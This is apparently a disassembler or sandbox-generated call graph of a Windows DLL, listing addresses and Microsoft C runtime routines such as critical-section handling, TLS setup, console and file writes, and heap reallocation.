23d75ab5 __fassign 6705->6706 6707 23d75a8e __fassign 6705->6707 6706->6701 6707->6706 6708 23d77cc2 __fassign 20 API calls 6707->6708 6708->6706 6712 23d756b9 RtlLeaveCriticalSection 6709->6712 6711 23d75852 6711->6703 6712->6711 6714 23d7382d 6713->6714 6718 23d7384b ___vcrt_freefls@4 6713->6718 6715 23d7383b 6714->6715 6719 23d73b67 6714->6719 6724 23d73ba2 6715->6724 6718->6636 6729 23d73a82 6719->6729 6721 23d73b81 6722 23d73b8d 6721->6722 6723 23d73b99 TlsGetValue 6721->6723 6722->6715 6723->6722 6725 23d73a82 try_get_function 5 API calls 6724->6725 6726 23d73bbc 6725->6726 6727 23d73bd7 TlsSetValue 6726->6727 6728 23d73bcb 6726->6728 6727->6728 6728->6718 6730 23d73aaa 6729->6730 6734 23d73aa6 __crt_fast_encode_pointer 6729->6734 6730->6734 6735 23d739be 6730->6735 6733 23d73ac4 GetProcAddress 6733->6734 6734->6721 6736 23d739cd try_get_first_available_module 6735->6736 6737 23d739ea LoadLibraryExW 6736->6737 6739 23d73a60 FreeLibrary 6736->6739 6740 23d73a77 6736->6740 6741 23d73a38 LoadLibraryExW 6736->6741 6737->6736 6738 23d73a05 GetLastError 6737->6738 6738->6736 6739->6736 6740->6733 6740->6734 6741->6736 6748 23d73856 6742->6748 6744 23d723f1 6744->6630 6745 23d753da 6744->6745 6746 23d75b7a __dosmaperr 20 API calls 6745->6746 6747 23d723fd 6746->6747 6747->6628 6747->6629 6749 23d73862 GetLastError 6748->6749 6750 23d7385f 6748->6750 6751 23d73b67 ___vcrt_FlsGetValue 6 API calls 6749->6751 6750->6744 6752 23d73877 6751->6752 6753 23d738dc SetLastError 6752->6753 6754 23d73ba2 ___vcrt_FlsSetValue 6 API calls 6752->6754 6759 23d73896 6752->6759 6753->6744 6755 23d73890 6754->6755 6756 23d738b8 6755->6756 6757 23d73ba2 ___vcrt_FlsSetValue 6 API calls 6755->6757 6755->6759 6758 23d73ba2 ___vcrt_FlsSetValue 6 API calls 6756->6758 6756->6759 6757->6756 6758->6759 6759->6753 6760 23d77bc7 6761 23d77bd3 ___scrt_is_nonwritable_in_current_image 6760->6761 6762 23d77c0a _abort 6761->6762 6768 23d75671 RtlEnterCriticalSection 6761->6768 6764 23d77be7 6765 23d77f86 __fassign 20 API calls 6764->6765 6766 23d77bf7 6765->6766 6769 23d77c10 6766->6769 6768->6764 6772 23d756b9 RtlLeaveCriticalSection 6769->6772 6771 23d77c17 6771->6762 6772->6771 6773 23d7a1c6 IsProcessorFeaturePresent 6959 23d7a945 6963 23d7a96d 6959->6963 6960 23d7a9a5 6961 23d7a997 6968 23d7aa17 6961->6968 6962 23d7a99e 6972 23d7aa00 6962->6972 6963->6960 6963->6961 6963->6962 6969 23d7aa20 6968->6969 6976 23d7b19b 6969->6976 6973 23d7aa20 6972->6973 6974 23d7b19b __startOneArgErrorHandling 21 API calls 6973->6974 6975 23d7a9a3 6974->6975 6978 23d7b1da __startOneArgErrorHandling 6976->6978 6982 23d7b25c __startOneArgErrorHandling 6978->6982 6986 23d7b59e 6978->6986 6979 23d7b286 6981 23d7b292 6979->6981 6993 23d7b8b2 6979->6993 6983 23d72ada _ValidateLocalCookies 5 API calls 6981->6983 6982->6979 6989 23d778a3 6982->6989 6985 23d7a99c 6983->6985 7000 23d7b5c1 6986->7000 6990 23d778cb 6989->6990 6991 23d72ada _ValidateLocalCookies 5 API calls 6990->6991 6992 23d778e8 6991->6992 6992->6979 6994 23d7b8d4 6993->6994 6995 23d7b8bf 6993->6995 6997 23d76368 _free 20 API calls 6994->6997 6996 23d7b8d9 6995->6996 6998 23d76368 _free 20 API calls 6995->6998 6996->6981 6997->6996 6999 23d7b8cc 6998->6999 6999->6981 7001 23d7b5ec __raise_exc 7000->7001 7002 23d7b7e5 RaiseException 7001->7002 7003 23d7b5bc 7002->7003 7003->6982 7004 23d7af43 7005 23d7af4d 7004->7005 7006 23d7af59 7004->7006 7005->7006 7007 23d7af52 CloseHandle 7005->7007 7007->7006 7008 23d78640 7011 23d78657 7008->7011 7012 23d78665 7011->7012 7013 23d78679 7011->7013 7016 23d76368 _free 20 API calls 7012->7016 7014 23d78693 7013->7014 7015 23d78681 7013->7015 7020 23d754a7 __fassign 38 API calls 7014->7020 7023 23d78652 7014->7023 7017 23d76368 _free 20 API calls 7015->7017 7018 23d7866a 7016->7018 7019 23d78686 7017->7019 7021 23d762ac ___std_exception_copy 26 API calls 7018->7021 7022 23d762ac ___std_exception_copy 26 API calls 7019->7022 7020->7023 7021->7023 7022->7023 7024 23d7284f 7027 23d72882 7024->7027 7030 23d73550 7027->7030 7029 23d7285d 7031 23d7355d 7030->7031 7034 23d7358a 7030->7034 7032 23d747e5 ___std_exception_copy 21 API calls 7031->7032 7031->7034 7033 23d7357a 7032->7033 7033->7034 7035 23d7544d ___std_exception_copy 26 API calls 7033->7035 7034->7029 7035->7034 7036 23d7724e GetProcessHeap 7037 23d72049 7038 23d72055 ___scrt_is_nonwritable_in_current_image 7037->7038 7039 23d7205e 7038->7039 7040 23d720d3 7038->7040 7041 23d7207d 7038->7041 7072 23d72639 IsProcessorFeaturePresent 7040->7072 7051 23d7244c 7041->7051 7044 23d720da 7045 23d72082 7060 23d72308 7045->7060 7047 23d72087 __RTC_Initialize 7063 23d720c4 7047->7063 7049 23d7209f 7066 23d7260b 7049->7066 7052 23d72451 ___scrt_release_startup_lock 7051->7052 7053 23d72455 7052->7053 7056 23d72461 7052->7056 7054 23d7527a _abort 20 API calls 7053->7054 7055 23d7245f 7054->7055 7055->7045 7057 23d7246e 7056->7057 7058 23d7499b _abort 28 API calls 7056->7058 7057->7045 7059 23d74bbd 7058->7059 7059->7045 7076 23d734c7 RtlInterlockedFlushSList 7060->7076 7062 23d72312 7062->7047 7078 23d7246f 7063->7078 7065 23d720c9 ___scrt_release_startup_lock 7065->7049 7067 23d72617 7066->7067 7069 23d7262d 7067->7069 7095 23d753ed 7067->7095 7069->7039 7073 23d7264e ___scrt_fastfail 7072->7073 7074 23d726f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7073->7074 7075 23d72744 ___scrt_fastfail 7074->7075 7075->7044 7077 23d734d7 7076->7077 7077->7062 7083 23d753ff 7078->7083 7084 23d75c2b 11 API calls 7083->7084 7085 23d72476 7084->7085 7086 23d7391b 7085->7086 7087 23d73925 7086->7087 7088 23d7354d 7086->7088 7090 23d73b2c 7087->7090 7088->7065 7091 23d73a82 try_get_function 5 API calls 7090->7091 7092 23d73b46 7091->7092 7093 23d73b5e TlsFree 7092->7093 7094 23d73b52 7092->7094 7093->7094 7094->7088 7106 23d774da 7095->7106 7098 23d73529 7099 23d73532 7098->7099 7105 23d73543 7098->7105 7100 23d7391b ___vcrt_uninitialize_ptd 6 API calls 7099->7100 7101 23d73537 7100->7101 7110 23d73972 7101->7110 7105->7069 7107 23d774f3 7106->7107 7108 23d72ada _ValidateLocalCookies 5 API calls 7107->7108 7109 23d72625 7108->7109 7109->7098 7111 23d7353c 7110->7111 7112 23d7397d 7110->7112 7114 23d73c50 7111->7114 7113 23d73987 RtlDeleteCriticalSection 7112->7113 7113->7111 7113->7113 7115 23d73c7f 7114->7115 7116 23d73c59 7114->7116 7115->7105 7116->7115 7117 23d73c69 FreeLibrary 7116->7117 7117->7116 7118 23d75348 7119 23d73529 ___vcrt_uninitialize 8 API calls 7118->7119 7120 23d7534f 7119->7120 7121 23d77b48 7131 23d78ebf 7121->7131 7125 23d77b55 7144 23d7907c 7125->7144 7128 23d77b7f 7129 23d7571e _free 20 API calls 7128->7129 7130 23d77b8a 7129->7130 7148 23d78ec8 7131->7148 7133 23d77b50 7134 23d78fdc 7133->7134 7135 23d78fe8 ___scrt_is_nonwritable_in_current_image 7134->7135 7168 23d75671 RtlEnterCriticalSection 7135->7168 7137 23d7905e 7182 23d79073 7137->7182 7139 23d7906a _abort 7139->7125 7140 23d79032 RtlDeleteCriticalSection 7141 23d7571e _free 20 API calls 7140->7141 7143 23d78ff3 7141->7143 7143->7137 7143->7140 7169 23d7a09c 7143->7169 7145 23d79092 7144->7145 7147 23d77b64 RtlDeleteCriticalSection 7144->7147 7146 23d7571e _free 20 API calls 7145->7146 7145->7147 7146->7147 7147->7125 7147->7128 7149 23d78ed4 ___scrt_is_nonwritable_in_current_image 7148->7149 7158 23d75671 RtlEnterCriticalSection 7149->7158 7151 23d78f77 7163 23d78f97 7151->7163 7154 23d78f83 _abort 7154->7133 7156 23d78ee3 7156->7151 7157 23d78e78 66 API calls 7156->7157 7159 23d77b94 RtlEnterCriticalSection 7156->7159 7160 23d78f6d 7156->7160 7157->7156 7158->7156 7159->7156 7166 23d77ba8 RtlLeaveCriticalSection 7160->7166 7162 23d78f75 7162->7156 7167 23d756b9 RtlLeaveCriticalSection 7163->7167 7165 23d78f9e 7165->7154 7166->7162 7167->7165 7168->7143 7170 23d7a0a8 ___scrt_is_nonwritable_in_current_image 7169->7170 7171 23d7a0ce 7170->7171 7172 23d7a0b9 7170->7172 7179 23d7a0c9 _abort 7171->7179 7185 23d77b94 RtlEnterCriticalSection 7171->7185 7173 23d76368 _free 20 API calls 7172->7173 7175 23d7a0be 7173->7175 7177 23d762ac ___std_exception_copy 26 API calls 7175->7177 7176 23d7a0ea 7186 23d7a026 7176->7186 7177->7179 7179->7143 7180 23d7a0f5 7202 23d7a112 7180->7202 7450 23d756b9 RtlLeaveCriticalSection 7182->7450 7184 23d7907a 7184->7139 7185->7176 7187 23d7a033 7186->7187 7188 23d7a048 7186->7188 7189 23d76368 _free 20 API calls 7187->7189 7194 23d7a043 7188->7194 7205 23d78e12 7188->7205 7190 23d7a038 7189->7190 7192 23d762ac ___std_exception_copy 26 API calls 7190->7192 7192->7194 7194->7180 7195 23d7907c 20 API calls 7196 23d7a064 7195->7196 7211 23d77a5a 7196->7211 7198 23d7a06a 7218 23d7adce 7198->7218 7201 23d7571e _free 20 API calls 7201->7194 7449 23d77ba8 RtlLeaveCriticalSection 7202->7449 7204 23d7a11a 7204->7179 7206 23d78e2a 7205->7206 7208 23d78e26 7205->7208 7207 23d77a5a 26 API calls 7206->7207 7206->7208 7209 23d78e4a 7207->7209 7208->7195 7233 23d79a22 7209->7233 7212 23d77a66 7211->7212 7213 23d77a7b 7211->7213 7214 23d76368 _free 20 API calls 7212->7214 7213->7198 7215 23d77a6b 7214->7215 7216 23d762ac ___std_exception_copy 26 API calls 7215->7216 7217 23d77a76 7216->7217 7217->7198 7219 23d7adf2 7218->7219 7220 23d7addd 7218->7220 7222 23d7ae2d 7219->7222 7227 23d7ae19 7219->7227 7221 23d76355 __dosmaperr 20 API calls 7220->7221 7224 23d7ade2 7221->7224 7223 23d76355 __dosmaperr 20 API calls 7222->7223 7225 23d7ae32 7223->7225 7226 23d76368 _free 20 API calls 7224->7226 7229 23d76368 _free 20 API calls 7225->7229 7230 23d7a070 7226->7230 7406 23d7ada6 7227->7406 7231 23d7ae3a 7229->7231 7230->7194 7230->7201 7232 23d762ac ___std_exception_copy 26 API calls 7231->7232 7232->7230 7234 23d79a2e ___scrt_is_nonwritable_in_current_image 7233->7234 7235 23d79a36 7234->7235 7236 23d79a4e 7234->7236 7258 23d76355 7235->7258 7237 23d79aec 7236->7237 7242 23d79a83 7236->7242 7239 23d76355 __dosmaperr 20 API calls 7237->7239 7243 23d79af1 7239->7243 7241 23d76368 _free 20 API calls 7252 23d79a43 _abort 7241->7252 7261 23d78c7b RtlEnterCriticalSection 7242->7261 7245 23d76368 _free 20 API calls 7243->7245 7247 23d79af9 7245->7247 7246 23d79a89 7248 23d79aa5 7246->7248 7249 23d79aba 7246->7249 7250 23d762ac ___std_exception_copy 26 API calls 7247->7250 7251 23d76368 _free 20 API calls 7248->7251 7262 23d79b0d 7249->7262 7250->7252 7254 23d79aaa 7251->7254 7252->7208 7256 23d76355 __dosmaperr 20 API calls 7254->7256 7255 23d79ab5 7313 23d79ae4 7255->7313 7256->7255 7259 23d75b7a __dosmaperr 20 API calls 7258->7259 7260 23d7635a 7259->7260 7260->7241 7261->7246 7263 23d79b3b 7262->7263 7300 23d79b34 7262->7300 7264 23d79b3f 7263->7264 7265 23d79b5e 7263->7265 7266 23d76355 __dosmaperr 20 API calls 7264->7266 7269 23d79baf 7265->7269 7270 23d79b92 7265->7270 7268 23d79b44 7266->7268 7267 23d72ada _ValidateLocalCookies 5 API calls 7271 23d79d15 7267->7271 7272 23d76368 _free 20 API calls 7268->7272 7273 23d79bc5 7269->7273 7316 23d7a00b 7269->7316 7274 23d76355 __dosmaperr 20 API calls 7270->7274 7271->7255 7276 23d79b4b 7272->7276 7319 23d796b2 7273->7319 7275 23d79b97 7274->7275 7279 23d76368 _free 20 API calls 7275->7279 7280 23d762ac ___std_exception_copy 26 API calls 7276->7280 7282 23d79b9f 7279->7282 7280->7300 7285 23d762ac ___std_exception_copy 26 API calls 7282->7285 7283 23d79bd3 7288 23d79bd7 7283->7288 7289 23d79bf9 7283->7289 7284 23d79c0c 7286 23d79c66 WriteFile 7284->7286 7287 23d79c20 7284->7287 7285->7300 7290 23d79c89 GetLastError 7286->7290 7297 23d79bef 7286->7297 7292 23d79c56 7287->7292 7293 23d79c28 7287->7293 7294 23d79ccd 7288->7294 7326 23d79645 7288->7326 7331 23d79492 GetConsoleCP 7289->7331 7290->7297 7357 23d79728 7292->7357 7298 23d79c46 7293->7298 7299 23d79c2d 7293->7299 7294->7300 7301 23d76368 _free 20 API calls 7294->7301 7297->7294 7297->7300 7304 23d79ca9 7297->7304 7349 23d798f5 7298->7349 7299->7294 7342 23d79807 7299->7342 7300->7267 7303 23d79cf2 7301->7303 7306 23d76355 __dosmaperr 20 API calls 7303->7306 7307 23d79cc4 7304->7307 7308 23d79cb0 7304->7308 7306->7300 7364 23d76332 7307->7364 7309 23d76368 _free 20 API calls 7308->7309 7311 23d79cb5 7309->7311 7312 23d76355 __dosmaperr 20 API calls 7311->7312 7312->7300 7405 23d78c9e RtlLeaveCriticalSection 7313->7405 7315 23d79aea 7315->7252 7369 23d79f8d 7316->7369 7391 23d78dbc 7319->7391 7321 23d796c2 7322 23d796c7 7321->7322 7323 23d75af6 _abort 38 API calls 7321->7323 7322->7283 7322->7284 7324 23d796ea 7323->7324 7324->7322 7325 23d79708 GetConsoleMode 7324->7325 7325->7322 7327 23d7969f 7326->7327 7330 23d7966a 7326->7330 7327->7297 7328 23d7a181 WriteConsoleW CreateFileW 7328->7330 7329 23d796a1 GetLastError 7329->7327 7330->7327 7330->7328 7330->7329 7333 23d794f5 7331->7333 7341 23d79607 7331->7341 7332 23d72ada _ValidateLocalCookies 5 API calls 7335 23d79641 7332->7335 7336 23d779e6 40 API calls __fassign 7333->7336 7337 23d7957b WideCharToMultiByte 7333->7337 7340 23d795d2 WriteFile 7333->7340 7333->7341 7400 23d77c19 7333->7400 7335->7297 7336->7333 7338 23d795a1 WriteFile 7337->7338 7337->7341 7338->7333 7339 23d7962a GetLastError 7338->7339 7339->7341 7340->7333 7340->7339 7341->7332 7347 23d79816 7342->7347 7343 23d798d8 7344 23d72ada _ValidateLocalCookies 5 API calls 7343->7344 7346 23d798f1 7344->7346 7345 23d79894 WriteFile 7345->7347 7348 23d798da GetLastError 7345->7348 7346->7297 7347->7343 7347->7345 7348->7343 7356 23d79904 7349->7356 7350 23d79a0f 7351 23d72ada _ValidateLocalCookies 5 API calls 7350->7351 7353 23d79a1e 7351->7353 7352 23d79986 WideCharToMultiByte 7354 23d79a07 GetLastError 7352->7354 7355 23d799bb WriteFile 7352->7355 7353->7297 7354->7350 7355->7354 7355->7356 7356->7350 7356->7352 7356->7355 7358 23d79737 7357->7358 7359 23d797ea 7358->7359 7361 23d797a9 WriteFile 7358->7361 7360 23d72ada _ValidateLocalCookies 5 API calls 7359->7360 7362 23d79803 7360->7362 7361->7358 7363 23d797ec GetLastError 7361->7363 7362->7297 7363->7359 7365 23d76355 __dosmaperr 20 API calls 7364->7365 7366 23d7633d _free 7365->7366 7367 23d76368 _free 20 API calls 7366->7367 7368 23d76350 7367->7368 7368->7300 7378 23d78d52 7369->7378 7371 23d79f9f 7372 23d79fa7 7371->7372 7373 23d79fb8 SetFilePointerEx 7371->7373 7374 23d76368 _free 20 API calls 7372->7374 7375 23d79fd0 GetLastError 7373->7375 7376 23d79fac 7373->7376 7374->7376 7377 23d76332 __dosmaperr 20 API calls 7375->7377 7376->7273 7377->7376 7379 23d78d74 7378->7379 7380 23d78d5f 7378->7380 7382 23d76355 __dosmaperr 20 API calls 7379->7382 7384 23d78d99 7379->7384 7381 23d76355 __dosmaperr 20 API calls 7380->7381 7383 23d78d64 7381->7383 7385 23d78da4 7382->7385 7386 23d76368 _free 20 API calls 7383->7386 7384->7371 7387 23d76368 _free 20 API calls 7385->7387 7389 23d78d6c 7386->7389 7388 23d78dac 7387->7388 7390 23d762ac ___std_exception_copy 26 API calls 7388->7390 7389->7371 7390->7389 7392 23d78dd6 7391->7392 7393 23d78dc9 7391->7393 7395 23d78de2 7392->7395 7396 23d76368 _free 20 API calls 7392->7396 7394 23d76368 _free 20 API calls 7393->7394 7397 23d78dce 7394->7397 7395->7321 7398 23d78e03 7396->7398 7397->7321 7399 23d762ac ___std_exception_copy 26 API calls 7398->7399 7399->7397 7401 23d75af6 _abort 38 API calls 7400->7401 7402 23d77c24 7401->7402 7403 23d77a00 __fassign 38 API calls 7402->7403 7404 23d77c34 7403->7404 7404->7333 7405->7315 7409 23d7ad24 7406->7409 7408 23d7adca 7408->7230 7410 23d7ad30 ___scrt_is_nonwritable_in_current_image 7409->7410 7420 23d78c7b RtlEnterCriticalSection 7410->7420 7412 23d7ad3e 7413 23d7ad65 7412->7413 7414 23d7ad70 7412->7414 7421 23d7ae4d 7413->7421 7416 23d76368 _free 20 API calls 7414->7416 7417 23d7ad6b 7416->7417 7436 23d7ad9a 7417->7436 7419 23d7ad8d _abort 7419->7408 7420->7412 7422 23d78d52 26 API calls 7421->7422 7424 23d7ae5d 7422->7424 7423 23d7ae63 7439 23d78cc1 7423->7439 7424->7423 7426 23d7ae95 7424->7426 7428 23d78d52 26 API calls 7424->7428 7426->7423 7429 23d78d52 26 API calls 7426->7429 7431 23d7ae8c 7428->7431 7432 23d7aea1 CloseHandle 7429->7432 7430 23d7aedd 7430->7417 7434 23d78d52 26 API calls 7431->7434 7432->7423 7435 23d7aead GetLastError 7432->7435 7433 23d76332 __dosmaperr 20 API calls 7433->7430 7434->7426 7435->7423 7448 23d78c9e RtlLeaveCriticalSection 7436->7448 7438 23d7ada4 7438->7419 7440 23d78d37 7439->7440 7441 23d78cd0 7439->7441 7442 23d76368 _free 20 API calls 7440->7442 7441->7440 7447 23d78cfa 7441->7447 7443 23d78d3c 7442->7443 7444 23d76355 __dosmaperr 20 API calls 7443->7444 7445 23d78d27 7444->7445 7445->7430 7445->7433 7446 23d78d21 SetStdHandle 7446->7445 7447->7445 7447->7446 7448->7438 7449->7204 7450->7184 7451 23d79e71 7452 23d79e95 7451->7452 7453 23d79eae 7452->7453 7456 23d7ac6b __startOneArgErrorHandling 7452->7456 7454 23d7aa53 21 API calls 7453->7454 7455 23d79ef8 7453->7455 7454->7455 7458 23d7acad __startOneArgErrorHandling 7456->7458 7459 23d7b2f0 7456->7459 7460 23d7b329 __startOneArgErrorHandling 7459->7460 7461 23d7b5c1 __raise_exc RaiseException 7460->7461 7462 23d7b350 __startOneArgErrorHandling 7460->7462 7461->7462 7463 23d7b393 7462->7463 7464 23d7b36e 7462->7464 7465 23d7b8b2 __startOneArgErrorHandling 20 API calls 7463->7465 7470 23d7b8e1 7464->7470 7467 23d7b38e __startOneArgErrorHandling 7465->7467 7468 23d72ada _ValidateLocalCookies 5 API calls 7467->7468 7469 23d7b3b7 7468->7469 7469->7458 7471 23d7b8f0 7470->7471 7472 23d7b964 __startOneArgErrorHandling 7471->7472 7473 23d7b90f __startOneArgErrorHandling 7471->7473 7474 23d7b8b2 __startOneArgErrorHandling 20 API calls 7472->7474 7475 23d778a3 __startOneArgErrorHandling 5 API calls 7473->7475 7478 23d7b95d 7474->7478 7476 23d7b950 7475->7476 7477 23d7b8b2 __startOneArgErrorHandling 20 API calls 7476->7477 7476->7478 7477->7478 7478->7467 7479 23d73370 7490 23d73330 7479->7490 7491 23d73342 7490->7491 7492 23d7334f 7490->7492 7493 23d72ada _ValidateLocalCookies 5 API calls 7491->7493 7493->7492 6774 23d75bff 6782 23d75d5c 6774->6782 6777 23d75c13 6778 23d75b7a __dosmaperr 20 API calls 6779 23d75c1b 6778->6779 6780 23d75c28 6779->6780 6789 23d75c2b 6779->6789 6783 23d75c45 __dosmaperr 5 API calls 6782->6783 6784 23d75d83 6783->6784 6785 23d75d9b TlsAlloc 6784->6785 6786 23d75d8c 6784->6786 6785->6786 6787 23d72ada _ValidateLocalCookies 5 API calls 6786->6787 6788 23d75c09 6787->6788 6788->6777 6788->6778 6790 23d75c35 6789->6790 6792 23d75c3b 6789->6792 6793 23d75db2 6790->6793 6792->6777 6794 23d75c45 __dosmaperr 5 API calls 6793->6794 6795 23d75dd9 6794->6795 6796 23d75df1 TlsFree 6795->6796 6797 23d75de5 6795->6797 6796->6797 6798 23d72ada _ValidateLocalCookies 5 API calls 6797->6798 6799 23d75e02 6798->6799 6799->6792 7494 23d76664 7495 23d76675 7494->7495 7496 23d72ada _ValidateLocalCookies 5 API calls 7495->7496 7497 23d76701 7496->7497 7498 23d76761 7499 23d7677f 7498->7499 7502 23d766e6 7498->7502 7506 23d781a0 7499->7506 7500 23d766eb FindClose 7503 23d766f2 7500->7503 7502->7500 7502->7503 7504 23d72ada _ValidateLocalCookies 5 API calls 7503->7504 7505 23d76701 7504->7505 7507 23d781d9 7506->7507 7508 23d781dd 7507->7508 7510 23d78205 7507->7510 7509 23d76368 _free 20 API calls 7508->7509 7511 23d781e2 7509->7511 7512 23d78529 7510->7512 7520 23d780c0 7510->7520 7513 23d762ac ___std_exception_copy 26 API calls 7511->7513 7514 23d72ada _ValidateLocalCookies 5 API calls 7512->7514 7515 23d781ed 7513->7515 7516 23d78536 7514->7516 7517 23d72ada _ValidateLocalCookies 5 API calls 7515->7517 7516->7502 7519 23d781f9 7517->7519 7519->7502 7523 23d780db 7520->7523 7521 23d72ada _ValidateLocalCookies 5 API calls 7522 23d78152 7521->7522 7522->7510 7523->7521 7524 23d79d61 7525 23d79d81 7524->7525 7528 23d79db8 7525->7528 7527 23d79dab 7529 23d79dbf 7528->7529 7530 23d79e20 7529->7530 7534 23d79ddf 7529->7534 7531 23d7aa17 21 API calls 7530->7531 7532 23d7a90e 7530->7532 7533 23d79e6e 7531->7533 7532->7527 7533->7527 7534->7532 7535 23d7aa17 21 API calls 7534->7535 7536 23d7a93e 7535->7536 7536->7527 6800 23d7a1e0 6803 23d7a1fe 6800->6803 6802 23d7a1f6 6806 23d7a203 6803->6806 6804 23d7a298 6804->6802 6806->6804 6808 23d7aa53 6806->6808 6809 23d7aa70 RtlDecodePointer 6808->6809 6812 23d7aa80 6808->6812 6809->6812 6810 23d7ab02 6811 23d72ada _ValidateLocalCookies 5 API calls 6810->6811 6814 23d7a42f 6811->6814 6812->6810 6813 23d7ab0d 6812->6813 6815 23d7aab7 6812->6815 6813->6810 6816 23d76368 _free 20 API calls 6813->6816 6814->6802 6815->6810 6817 23d76368 _free 20 API calls 6815->6817 6816->6810 6817->6810 7537 23d77260 GetStartupInfoW 7538 23d77286 7537->7538 7539 23d77318 7537->7539 7538->7539 7540 23d78be3 27 API calls 7538->7540 7541 23d772af 7540->7541 7541->7539 7542 23d772dd GetFileType 7541->7542 7542->7541 7543 23d7506f 7544 23d75081 7543->7544 7545 23d75087 7543->7545 7546 23d75000 20 API calls 7544->7546 7546->7545 6818 23d765ec 6823 23d767bf 6818->6823 6821 23d7571e _free 20 API calls 6822 23d765ff 6821->6822 6828 23d767f4 6823->6828 6826 23d7571e _free 20 API calls 6827 23d765f6 6826->6827 6827->6821 6829 23d76806 6828->6829 6837 23d767cd 6828->6837 6830 23d76836 6829->6830 6831 23d7680b 6829->6831 6830->6837 6839 23d771d6 6830->6839 6832 23d7637b __dosmaperr 20 API calls 6831->6832 6833 23d76814 6832->6833 6835 23d7571e _free 20 API calls 6833->6835 6835->6837 6836 23d76851 6838 23d7571e _free 20 API calls 6836->6838 6837->6826 6837->6827 6838->6837 6840 23d771e1 6839->6840 6841 23d77209 6840->6841 6842 23d771fa 6840->6842 6843 23d77218 6841->6843 6848 23d78a98 6841->6848 6845 23d76368 _free 20 API calls 6842->6845 6855 23d78acb 6843->6855 6847 23d771ff ___scrt_fastfail 6845->6847 6847->6836 6849 23d78aa3 6848->6849 6850 23d78ab8 RtlSizeHeap 6848->6850 6851 23d76368 _free 20 API calls 6849->6851 6850->6843 6852 23d78aa8 6851->6852 6853 23d762ac ___std_exception_copy 26 API calls 6852->6853 6854 23d78ab3 6853->6854 6854->6843 6856 23d78ae3 6855->6856 6857 23d78ad8 6855->6857 6859 23d78aeb 6856->6859 6865 23d78af4 __dosmaperr 6856->6865 6858 23d756d0 21 API calls 6857->6858 6863 23d78ae0 6858->6863 6860 23d7571e _free 20 API calls 6859->6860 6860->6863 6861 23d78b1e RtlReAllocateHeap 6861->6863 6861->6865 6862 23d78af9 6864 23d76368 _free 20 API calls 6862->6864 6863->6847 6864->6863 6865->6861 6865->6862 6866 23d7474f __dosmaperr 7 API calls 6865->6866 6866->6865 6867 23d785eb 6871 23d7853a 6867->6871 6868 23d7854f 6869 23d76368 _free 20 API calls 6868->6869 6870 23d78554 6868->6870 6872 23d7857a 6869->6872 6871->6868 6871->6870 6874 23d7858b 6871->6874 6873 23d762ac ___std_exception_copy 26 API calls 6872->6873 6873->6870 6874->6870 6875 23d76368 _free 20 API calls 6874->6875 6875->6872 7547 23d7ac6b 7548 23d7ac84 __startOneArgErrorHandling 7547->7548 7549 23d7b2f0 21 API calls 7548->7549 7550 23d7acad __startOneArgErrorHandling 7548->7550 7549->7550 6876 23d73c90 RtlUnwind 7551 23d7281c 7552 23d72882 std::exception::exception 27 API calls 7551->7552 7553 23d7282a 7552->7553 6877 23d7679a 6878 23d767a4 6877->6878 6879 23d767b4 6878->6879 6880 23d7571e _free 20 API calls 6878->6880 6881 23d7571e _free 20 API calls 6879->6881 6880->6878 6882 23d767bb 6881->6882 6883 23d74a9a 6886 23d75411 6883->6886 6887 23d7541d _abort 6886->6887 6888 23d75af6 _abort 38 API calls 6887->6888 6889 23d75422 6888->6889 6890 23d755a8 _abort 38 API calls 6889->6890 6891 23d7544c 6890->6891 7554 23d72418 7556 23d72420 ___scrt_release_startup_lock 7554->7556 7558 23d747f5 7556->7558 7557 23d72448 7559 23d74804 7558->7559 7560 23d74808 7558->7560 7559->7557 7563 23d74815 7560->7563 7564 23d75b7a __dosmaperr 20 API calls 7563->7564 7567 23d7482c 7564->7567 7565 23d72ada _ValidateLocalCookies 5 API calls 7566 23d74811 7565->7566 7566->7557 7567->7565 7568 23d75303 7571 23d750a5 7568->7571 7580 23d7502f 7571->7580 7574 23d7502f 5 API calls 7575 23d750c3 7574->7575 7576 23d75000 20 API calls 7575->7576 7577 23d750ce 7576->7577 7578 23d75000 20 API calls 7577->7578 7579 23d750d9 7578->7579 7581 23d75048 7580->7581 7582 23d72ada _ValidateLocalCookies 5 API calls 7581->7582 7583 23d75069 7582->7583 7583->7574 7584 23d77103 GetCommandLineA GetCommandLineW 6892 23d77a80 6893 23d77a8d 6892->6893 6894 23d7637b __dosmaperr 20 API calls 6893->6894 6895 23d77aa7 6894->6895 6896 23d7571e _free 20 API calls 6895->6896 6897 23d77ab3 6896->6897 6898 23d7637b __dosmaperr 20 API calls 6897->6898 6902 23d77ad9 6897->6902 6900 23d77acd 6898->6900 6899 23d75eb7 11 API calls 6899->6902 6901 23d7571e _free 20 API calls 6900->6901 6901->6902 6902->6899 6903 23d77ae5 6902->6903 6904 23d77b43 6902->6904 7585 23d7220c 7586 23d72215 7585->7586 7587 23d7221a dllmain_dispatch 7585->7587 7589 23d722b1 7586->7589 7590 23d722c7 7589->7590 7592 23d722d0 7590->7592 7593 23d72264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7590->7593 7592->7587 7593->7592 6909 23d78a89 6910 23d76d60 51 API calls 6909->6910 6911 23d78a8e 6910->6911 6912 23d73eb3 6913 23d75411 38 API calls 6912->6913 6914 23d73ebb 6913->6914 7594 23d75630 7595 23d7563b 7594->7595 7596 23d75eb7 11 API calls 7595->7596 7597 23d75664 7595->7597 7599 23d75660 7595->7599 7596->7595 7600 23d75688 7597->7600 7601 23d756b4 7600->7601 7602 23d75695 7600->7602 7601->7599 7603 23d7569f RtlDeleteCriticalSection 7602->7603 7603->7601 7603->7603 7604 23d71f3f 7605 23d71f4b ___scrt_is_nonwritable_in_current_image 7604->7605 7622 23d7247c 7605->7622 7607 23d71f52 7608 23d72041 7607->7608 7609 23d71f7c 7607->7609 7616 23d71f57 ___scrt_is_nonwritable_in_current_image 7607->7616 7611 23d72639 ___scrt_fastfail 4 API calls 7608->7611 7633 23d723de 7609->7633 7612 23d72048 7611->7612 7613 23d71f8b __RTC_Initialize 7613->7616 7636 23d722fc RtlInitializeSListHead 7613->7636 7615 23d71f99 ___scrt_initialize_default_local_stdio_options 7637 23d746c5 7615->7637 7620 23d71fb8 7620->7616 7621 23d74669 _abort 5 API calls 7620->7621 7621->7616 7623 23d72485 7622->7623 7645 23d72933 IsProcessorFeaturePresent 7623->7645 7627 23d72496 7628 23d7249a 7627->7628 7656 23d753c8 7627->7656 7628->7607 7631 23d724b1 7631->7607 7632 23d73529 ___vcrt_uninitialize 8 API calls 